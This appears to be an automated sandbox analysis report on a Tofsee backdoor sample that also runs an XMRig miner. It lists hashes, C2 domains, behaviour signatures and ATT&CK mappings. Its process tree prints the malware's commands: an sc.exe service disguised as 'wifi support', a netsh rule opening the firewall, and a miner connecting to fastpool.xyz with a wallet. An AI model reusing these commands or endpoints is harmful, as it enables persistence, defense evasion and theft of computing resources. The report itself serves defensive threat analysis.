Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    02-06-2023 07:19

General

  • Target

    4a458d803e8e61bc4ec636056019195a.exe

  • Size

    238KB

  • MD5

    4a458d803e8e61bc4ec636056019195a

  • SHA1

    6a4023f613128a75952bf45adb305bca1cea5661

  • SHA256

    28a6f8d393c0459c87c8ca21d7bad4fae89514118fc35a871b2b6fd7662c571a

  • SHA512

    b04b2af5c82416b6a510ee2fa77a878e9349b855ad47b59bd46f10b5fc8189df165ddfcd9333214c14b7ea061f9fe8515aded4e11d1837fe3744afbe2db7f7e6

  • SSDEEP

    3072:u+pCVP0S8pa6DuW6C1jhWrqNbBSpjI1AYm7FSaRxu3hAhjlhVcuBKy4:RbS8p8CBhzNbsKHLaR0xWhVRG

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4a458d803e8e61bc4ec636056019195a.exe
    "C:\Users\Admin\AppData\Local\Temp\4a458d803e8e61bc4ec636056019195a.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\chllhjiu\
      2⤵
        PID:1620
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\sietogem.exe" C:\Windows\SysWOW64\chllhjiu\
        2⤵
          PID:1668
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create chllhjiu binPath= "C:\Windows\SysWOW64\chllhjiu\sietogem.exe /d\"C:\Users\Admin\AppData\Local\Temp\4a458d803e8e61bc4ec636056019195a.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1332
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description chllhjiu "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2036
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start chllhjiu
          2⤵
          • Launches sc.exe
          PID:1396
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1020
      • C:\Windows\SysWOW64\chllhjiu\sietogem.exe
        C:\Windows\SysWOW64\chllhjiu\sietogem.exe /d"C:\Users\Admin\AppData\Local\Temp\4a458d803e8e61bc4ec636056019195a.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1336
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1436
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.70000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:660

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\sietogem.exe
        Filesize

        14.0MB

        MD5

        bc1e11eb84ac63df8759ae9b25923b02

        SHA1

        52d8e73888dfc1299e4e25c10ca881ad7c7ca5b5

        SHA256

        facddcceddc08287b034ed41cea780a05239f0248c49aae77e17a86a5592d30c

        SHA512

        1682e6d94f245e91ad7c21333ba22bbe167df62644d3d08b6e8518fba44a28dfefc0ba784e745d7785b24c9ee20c97d92b30207a1c0cc2ea19ecd202e3cc129c

      • C:\Windows\SysWOW64\chllhjiu\sietogem.exe
        Filesize

        14.0MB

        MD5

        bc1e11eb84ac63df8759ae9b25923b02

        SHA1

        52d8e73888dfc1299e4e25c10ca881ad7c7ca5b5

        SHA256

        facddcceddc08287b034ed41cea780a05239f0248c49aae77e17a86a5592d30c

        SHA512

        1682e6d94f245e91ad7c21333ba22bbe167df62644d3d08b6e8518fba44a28dfefc0ba784e745d7785b24c9ee20c97d92b30207a1c0cc2ea19ecd202e3cc129c

      • memory/660-120-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/660-124-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/660-123-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/660-122-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/660-121-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/660-119-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/660-112-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/660-111-0x0000000000080000-0x0000000000171000-memory.dmp
        Filesize

        964KB

      • memory/1040-60-0x0000000000400000-0x00000000006BD000-memory.dmp
        Filesize

        2.7MB

      • memory/1040-56-0x0000000000220000-0x0000000000233000-memory.dmp
        Filesize

        76KB

      • memory/1336-65-0x0000000000400000-0x00000000006BD000-memory.dmp
        Filesize

        2.7MB

      • memory/1436-88-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-96-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-81-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1436-83-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-82-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-85-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-84-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-86-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-87-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-75-0x0000000000160000-0x0000000000166000-memory.dmp
        Filesize

        24KB

      • memory/1436-89-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-90-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-92-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-93-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-91-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-94-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-95-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-78-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-97-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-98-0x0000000000250000-0x0000000000260000-memory.dmp
        Filesize

        64KB

      • memory/1436-99-0x0000000000260000-0x0000000000265000-memory.dmp
        Filesize

        20KB

      • memory/1436-102-0x0000000000260000-0x0000000000265000-memory.dmp
        Filesize

        20KB

      • memory/1436-103-0x0000000005910000-0x0000000005D1B000-memory.dmp
        Filesize

        4.0MB

      • memory/1436-106-0x0000000005910000-0x0000000005D1B000-memory.dmp
        Filesize

        4.0MB

      • memory/1436-107-0x0000000000270000-0x0000000000277000-memory.dmp
        Filesize

        28KB

      • memory/1436-74-0x0000000001880000-0x0000000001A8F000-memory.dmp
        Filesize

        2.1MB

      • memory/1436-71-0x0000000001880000-0x0000000001A8F000-memory.dmp
        Filesize

        2.1MB

      • memory/1436-69-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1436-68-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1436-67-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1436-63-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/1436-62-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/1436-61-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB